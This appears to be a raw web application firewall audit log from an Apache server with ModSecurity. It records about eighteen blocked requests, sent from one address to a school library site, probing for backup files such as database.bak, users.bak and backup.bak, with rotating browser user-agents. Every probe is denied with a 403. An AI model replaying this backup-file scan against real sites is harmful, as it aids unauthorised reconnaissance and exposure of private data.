Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07c530b-Z-- --9f3b982b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonYAAAABA 103.236.140.4 59750 103.236.140.4 8181 --9f3b982b-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161611788 --9f3b982b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f3b982b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200741669 1571 (- - -) Stopwatch2: 1747683200741669 1571; combined=563, p1=271, p2=267, p3=0, p4=0, p5=24, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3b982b-Z-- --1831b63b-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9niwAAAEM 103.236.140.4 59600 103.236.140.4 8181 --1831b63b-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.1.1) Gecko/20100101 Firefox/52.1.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152961045 --1831b63b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1831b63b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200719709 27552 (- - -) Stopwatch2: 1747683200719709 27552; combined=656, p1=354, p2=277, p3=0, p4=0, p5=25, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1831b63b-Z-- --24d4053f-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nkQAAAEo 103.236.140.4 59468 103.236.140.4 8181 --24d4053f-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933812 --24d4053f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --24d4053f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200748317 1736 (- - -) Stopwatch2: 1747683200748317 1736; combined=663, p1=307, p2=326, p3=0, p4=0, p5=29, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24d4053f-Z-- --c1016e24-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nlgAAAEo 103.236.140.4 59464 103.236.140.4 8181 --c1016e24-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161087497 --c1016e24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c1016e24-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200750152 2347 (- - -) Stopwatch2: 1747683200750152 2347; combined=1074, p1=305, p2=600, p3=0, p4=0, p5=168, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1016e24-Z-- --66b00018-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_LQAAAI0 103.236.140.4 59044 103.236.140.4 8181 --66b00018-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154992646 --66b00018-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66b00018-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200750819 4688 (- - -) Stopwatch2: 1747683200750819 4688; combined=630, p1=296, p2=311, p3=0, p4=0, p5=23, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66b00018-Z-- --dc7a4503-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEwwAAAMY 103.236.140.4 59764 103.236.140.4 8181 --dc7a4503-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153976865 --dc7a4503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dc7a4503-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200742279 13367 (- - -) Stopwatch2: 1747683200742279 13367; combined=610, p1=288, p2=294, p3=0, p4=0, p5=27, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc7a4503-Z-- --f1014064-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nngAAAFg 103.236.140.4 59846 103.236.140.4 8181 --f1014064-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155451407 --f1014064-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1014064-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200749731 7387 (- - -) Stopwatch2: 1747683200749731 7387; combined=577, p1=340, p2=220, p3=0, p4=0, p5=17, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1014064-Z-- --094c216e-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIondgAAABI 103.236.140.4 59702 103.236.140.4 8181 --094c216e-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.4) Gecko/20100101 Firefox/52.7.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154009639 --094c216e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --094c216e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200755792 1639 (- - -) Stopwatch2: 1747683200755792 1639; combined=615, p1=324, p2=267, p3=0, p4=0, p5=23, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --094c216e-Z-- --3fd78e7d-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_NQAAAJQ 103.236.140.4 59877 103.236.140.4 8181 --3fd78e7d-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390808 --3fd78e7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3fd78e7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200753622 6714 (- - -) Stopwatch2: 1747683200753622 6714; combined=497, p1=290, p2=188, p3=0, p4=0, p5=19, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd78e7d-Z-- --d9f8a617-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEtAAAAMI 103.236.140.4 59826 103.236.140.4 8181 --d9f8a617-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165675011 --d9f8a617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9f8a617-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200733566 28203 (- - -) Stopwatch2: 1747683200733566 28203; combined=696, p1=351, p2=311, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9f8a617-Z-- --240e2113-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE0AAAAMQ 103.236.140.4 58970 103.236.140.4 8181 --240e2113-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152502287 --240e2113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --240e2113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200753513 8520 (- - -) Stopwatch2: 1747683200753513 8520; combined=606, p1=336, p2=245, p3=0, p4=0, p5=24, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --240e2113-Z-- --5ca08b3a-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nnwAAAEg 103.236.140.4 59470 103.236.140.4 8181 --5ca08b3a-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165675014 --5ca08b3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ca08b3a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200878789 1678 (- - -) Stopwatch2: 1747683200878789 1678; combined=609, p1=354, p2=231, p3=0, p4=0, p5=24, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca08b3a-Z-- --fcdf7113-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE2gAAAMw 103.236.140.4 59776 103.236.140.4 8181 --fcdf7113-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.3) Gecko/20100101 Firefox/52.7.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160399384 --fcdf7113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fcdf7113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200878779 1842 (- - -) Stopwatch2: 1747683200878779 1842; combined=553, p1=262, p2=272, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcdf7113-Z-- --ab503330-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOE6QAAAMI 103.236.140.4 59826 103.236.140.4 8181 --ab503330-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700068 --ab503330-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ab503330-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200886432 1563 (- - -) Stopwatch2: 1747683200886432 1563; combined=618, p1=285, p2=310, p3=0, p4=0, p5=23, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab503330-Z-- --d06e2006-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIongwAAAAI 103.236.140.4 58922 103.236.140.4 8181 --d06e2006-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 OPR/51.0.2830.34 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165150732 --d06e2006-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d06e2006-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200887110 1611 (- - -) Stopwatch2: 1747683200887110 1611; combined=621, p1=278, p2=317, p3=0, p4=0, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d06e2006-Z-- --dfc35d7b-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_OQAAAIg 103.236.140.4 59818 103.236.140.4 8181 --dfc35d7b-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162430994 --dfc35d7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dfc35d7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200891181 2066 (- - -) Stopwatch2: 1747683200891181 2066; combined=660, p1=428, p2=213, p3=0, p4=0, p5=19, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
